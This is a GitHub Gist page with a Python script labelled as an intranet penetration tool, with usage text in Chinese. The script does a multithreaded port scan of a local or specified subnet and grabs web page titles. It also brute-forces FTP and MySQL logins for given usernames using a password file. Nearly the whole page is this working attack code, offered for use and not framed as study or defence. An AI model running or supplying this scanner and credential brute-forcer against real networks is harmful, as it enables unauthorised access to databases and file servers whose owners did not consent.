Last active
September 8, 2022 16:38
-
-
Save Z-fly/65dbab96524064f28a4abd76c0a353a1 to your computer and use it in GitHub Desktop.
Python内网渗透
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import ftplib | |
import optparse | |
import os | |
import re | |
import socket | |
import sys | |
import threading | |
import IPy | |
import mysql.connector | |
import requests | |
routers = [] | |
lock = threading.Lock() | |
pass_dict = os.getcwd() + r'\password.txt' | |
compile_ip = re.compile(r'^((25[0-5]|2[0-4]\d|[01]?\d\d?)\.){3}(25[0-5]|2[0-4]\d|[01]?\d\d?)$') | |
def search_routers(Bip=None): | |
if Bip is None: | |
local_ips = socket.gethostbyname_ex(socket.gethostname())[2] | |
else: | |
local_ips = Bip | |
all_threads = [] | |
for lip in local_ips: | |
for i in range(1, 255): | |
array1 = lip.split('.') | |
array1[3] = str(i) | |
new_ip = '.'.join(array1) | |
for port in port_list: | |
dst_port = int(port) | |
t = threading.Thread(target=portScan, args=(new_ip, dst_port)) | |
t.start() | |
all_threads.append(t) | |
for t in all_threads: | |
t.join() | |
def portScan(rip, port): | |
scan_link = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
scan_link.settimeout(2) | |
result = scan_link.connect_ex((rip, port)) | |
scan_link.close() | |
if result == 0: | |
lock.acquire() | |
print(rip.ljust(15), f'\t{port}开放') | |
if port == 80: | |
get_title(rip, port) | |
routers.append((rip, port)) | |
lock.release() | |
else: | |
lock.acquire() | |
# print(rip.ljust(15), f'\t{port}关闭') | |
routers.append((rip, port)) | |
lock.release() | |
# def portScan(tgtIp, tgtPort): | |
# socket.setdefaulttimeout(1) | |
# s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) | |
# address = (tgtIp, tgtPort) | |
# try: | |
# s.connect(address) | |
# print('[+] {} : open [{}] '.format(tgtIp, tgtPort)) | |
# except Exception as e: | |
# s.close() | |
# print('[+] {} : closed [{}] error : {}'.format(tgtIp, tgtPort, e)) | |
# s.close() | |
def get_title(gip, port): | |
url = 'http://{}:{}'.format(gip, port) | |
res = requests.get(url=url) | |
try: | |
title = re.search(r'<title>(.*)</title>', res.text).group(1) | |
print('[{}] {}'.format(title, url)) | |
except: | |
pass | |
def brute_ftp(host, pass_file): | |
# user = ['root'] | |
for u in user: | |
print('\nFTP用户名 ' + u) | |
with open(pass_file, 'r') as f: | |
for line in f: | |
password = line.strip('\r').strip('\n') | |
print('尝试密码: ', password) | |
try: | |
ftp = ftplib.FTP(host) | |
ftp.login(u, password) | |
print('FTP登录 \033[1;32;40m成功\033[0m!') | |
print('FTP用户名 ' + u) | |
ftp.quit() | |
return True | |
except: | |
print('FTP登录 \033[1;31;40m失败\033[0m!') | |
# return False | |
def brute_mysql(host, pass_file): | |
# user = ['root'] | |
for u in user: | |
print('\nMySQL用户名 ' + u) | |
with open(pass_file, 'r') as f: | |
for line in f: | |
password = line.strip('\r').strip('\n') | |
print('尝试密码: ', password) | |
try: | |
mydb = mysql.connector.connect( | |
host=host, | |
user=u, | |
passwd=password | |
) | |
print('MySQL登录 \033[1;32;40m成功\033[0m!') | |
print('MySQL用户名 ' + u) | |
return True | |
except: | |
print('MySQL登录 \033[1;31;40m失败\033[0m!') | |
# return False | |
if __name__ == '__main__': | |
usage = '''直接运行或是输入其他错误参数,扫描本机所在局域网段\n | |
-o 指定扫描端口,用英文逗号隔开,默认扫描3306(mysql), 21(ftp), 80(http), 443(https)\n | |
扫描指定网段/ip:-i 网段/ip,如10.20.24.0/24,192.168.123.0\n | |
爆破指定服务:-b ftp/mysql -i ip -u 指定用户名列表,用英文逗号隔开 -p 指定密码文件\n | |
举例:demo -b mysql -i 127.0.0.1 -u root,admin -p C:\password.txt | |
爆破127.0.0.1的mysql服务器密码,爆破用户名root和admin的密码\n | |
demo -i 10.20.24.0/24 | |
扫描10.20.24.0/255.255.255.0网段下所有主机的服务 | |
''' | |
parse = optparse.OptionParser(usage=usage) | |
parse.add_option('-i', dest='add', type=str, help='网段或ip地址') | |
parse.add_option('-b', dest='server', type=str, help='爆破指定服务') | |
parse.add_option('-u', dest='user', type=str, help='爆破用户名') | |
parse.add_option('-p', dest='pass_dict', type=str, help='密码文件') | |
parse.add_option('-o', dest='port_list', type=str, help='指定端口') | |
options, argv = parse.parse_args() | |
# print(parse.usage) | |
# print(options) | |
if options.pass_dict is not None: | |
pass_dict = options.pass_dict | |
global user | |
if options.user is not None: | |
user = options.user.split(',') | |
else: | |
user = ['root'] | |
global port_list | |
if options.port_list is not None: | |
port_list = options.port_list.split(',') | |
# for port in options.port_list.split(','): | |
# if port.find('-') != -1: | |
# p = port.split('-') | |
# print(p[0], str(int(p[1] + 1))) | |
# for port2 in range(p[0], str(int(p[1] + 1))): | |
# port_list.append(port2) | |
# else: | |
# port_list.append(port) | |
else: | |
port_list = ['3306', '21', '80', '443'] | |
if options.add is None: | |
# for ip in socket.gethostbyname_ex(socket.gethostname())[2]: | |
# ips = IPy.IP(ip) | |
# ipz = [] | |
# for ip in ips: | |
# array = str(ip).split('.') | |
# ip2 = f'{array[0]}.{array[1]}.{array[2]}.0' | |
# if ip2 not in ipz: | |
# ipz.append(ip2) | |
# search_routers(ipz) | |
print(parse.usage) | |
search_routers() | |
sys.exit() | |
if options.server == 'ftp': | |
if options.pass_dict is not None: | |
brute_ftp(options.add, pass_file=options.pass_dict) | |
sys.exit() | |
else: | |
brute_ftp(options.add, pass_dict) | |
sys.exit() | |
elif options.server == 'mysql': | |
if options.pass_dict is not None: | |
brute_mysql(options.add, pass_file=options.pass_dict) | |
sys.exit() | |
else: | |
brute_mysql(options.add, pass_dict) | |
sys.exit() | |
if options.add.find('/') == -1: | |
if compile_ip.match(options.add): | |
search_routers([options.add]) | |
sys.exit() | |
else: | |
print(parse.usage) | |
search_routers() | |
sys.exit() | |
else: | |
ips = IPy.IP(options.add) | |
ipz = [] | |
for ip in ips: | |
array = str(ip).split('.') | |
ip2 = f'{array[0]}.{array[1]}.{array[2]}.0' | |
if ip2 not in ipz: | |
ipz.append(ip2) | |
search_routers(ipz) | |
sys.exit() | |
# search_routers(['10.20.24.0']) | |
# search_routers() | |
# python -m pip install -i https://pypi.tuna.tsinghua.edu.cn/simple mysql-connector IPy |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment